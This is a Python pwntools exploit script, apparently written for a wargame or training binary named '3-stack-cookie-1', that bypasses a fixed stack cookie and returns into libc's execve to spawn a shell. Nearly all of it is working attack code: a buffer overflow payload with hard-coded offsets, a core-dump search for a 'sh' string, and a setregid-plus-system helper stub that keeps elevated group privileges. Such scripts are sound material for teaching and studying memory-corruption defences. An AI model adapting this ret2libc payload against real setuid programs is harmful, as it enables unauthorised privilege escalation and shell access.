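#!/usr/bin/env python
"""Stack-cookie bypass for ./3-stack-cookie-1 (32-bit, ASLR off).

Stack layout of the vulnerable frame, taken from gdb:

    Buffer = -0x88(%ebp)
    Cookie = -0x4(%ebp)
    Cookie - Buffer = 0x84
    [ BUFFER 0x84 ] [COOKIE] [Saved ebp] [retaddr]

The cookie in this build is the fixed value 0xfaceb00c, so the overflow
rewrites it with the same value and carries on into the saved ebp and the
return address.

Two runs are needed:

1. Overwrite the return address with garbage so the process crashes, then
   pull the stack address of a NUL-terminated "sh" string out of the core.
2. Return into libc's execve("sh", 0, 0) with that string as the filename.

Preconditions the script cannot establish for you:
  * ASLR disabled, otherwise the hard-coded execve address and the stack
    address recovered from the core are meaningless on the second run.
  * Core dumps enabled (`ulimit -c unlimited`) and kernel.core_pattern
    writing a file named `core` into the current directory.
  * A file named `sh` in the current directory -- execve() does not search
    PATH, so "sh" is resolved relative to the cwd.  Build it from:

        int main() {
            setregid(getegid(), getegid());
            system("sh");
        }
"""
import os

from pwn import *

# Target binary.  The original script spawned "./3-stack-cookie-1" for the
# crash run and "./stack-cookie-1" for the exploit run; the layout, cookie and
# stack address taken from the first run only hold if the second run is the
# same binary, so both runs now use one name.
BINARY = "./3-stack-cookie-1"

# Fixed stack cookie of this build (see the gdb notes above).
COOKIE = 0xFACEB00C

# Distance from the start of the overflowed buffer to the cookie.
BUF_TO_COOKIE = 0x84

# Address of execve() in libc, from 'print execve' in gdb.  Only valid while
# ASLR is off and the same libc is mapped at the same base.
EXECVE = 0xF7EB27E0


def find_sh_on_stack():
    """Crash the target and return the stack address of a "sh\\0" string.

    Sends a payload that keeps the cookie intact but clobbers the saved ebp
    and the return address, waits for the resulting core dump and searches
    its stack mapping for a NUL-terminated "sh".  The original looked for
    the bare two bytes "sh", which can land in the middle of a longer string
    (e.g. "/usr/share/...") and make execve() open the wrong path; a
    trailing NUL is what execve() actually needs.

    Returns:
        int: absolute stack address of the string.

    Raises:
        RuntimeError: if the core holds no such string.
    """
    p = process(BINARY)
    payload = cyclic(BUF_TO_COOKIE) + p32(COOKIE) + b"CCCC" + b"XXXX"
    p.send(payload)
    print(p.recv(0x100))
    p.wait()

    core = Core("core")
    # Mapping.find() returns -1 rather than raising when the needle is absent.
    addr = core.stack.find(b"sh\x00")
    if addr == -1:
        raise RuntimeError('no NUL-terminated "sh" found on the stack in core; '
                           'check the environment the target inherits')
    return addr


def spawn_shell(addr_of_sh):
    """Return into execve(addr_of_sh, NULL, NULL) and hand over the terminal.

    Frame after the overflow:
        [cookie][fake ebp][execve][fake ret][filename][argv=0][envp=0]

    All pieces are bytes: the original mixed str ("CCCC", "DDDD") with the
    bytes returned by cyclic()/p32(), which is a TypeError on Python 3.

    Args:
        addr_of_sh: stack address of a NUL-terminated "sh" string, as
            returned by find_sh_on_stack().
    """
    p = process(BINARY)
    payload = (cyclic(BUF_TO_COOKIE)
               + p32(COOKIE)
               + b"CCCC"            # saved ebp -- value is irrelevant
               + p32(EXECVE)        # return address -> execve()
               + b"DDDD"            # return address execve() would use
               + p32(addr_of_sh)    # filename: "sh" on the stack
               + p32(0)             # argv = NULL
               + p32(0))            # envp = NULL
    p.send(payload)
    p.interactive()


if __name__ == "__main__":
    # execve("sh", ...) resolves "sh" relative to the target's cwd; without
    # the helper binary the exploit silently fails instead of giving a shell.
    if not os.path.isfile("sh"):
        raise RuntimeError("no ./sh helper in the current directory; "
                           "build the setregid()+system(\"sh\") stub first")
    spawn_shell(find_sh_on_stack())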